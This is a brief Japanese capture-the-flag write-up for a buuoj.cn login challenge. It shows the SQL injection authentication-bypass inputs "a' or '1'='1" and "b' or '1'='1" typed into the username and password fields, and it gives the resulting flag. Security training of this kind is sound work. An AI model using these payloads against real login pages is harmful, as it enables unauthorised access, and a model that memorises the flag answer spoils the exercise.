件名アドレス:https://buuoj.cn/challenges
問題解決のアイデア
最初のステップ:トピックを入力し、ログインページを見つけます。トピックはプロンプトを表示するため、SQLインジェクションを使用して攻撃します
ステップ2:ログイン検出に合格するためのSQlステートメントを作成します
- ユーザー名の入力
a' or '1'='1
- パスワードを入力してください
b' or '1'='1
- ログインをクリックして、フラグを見つけます:flag {d0c260b5-1d98-4962-ac9a-501f791cc5c6}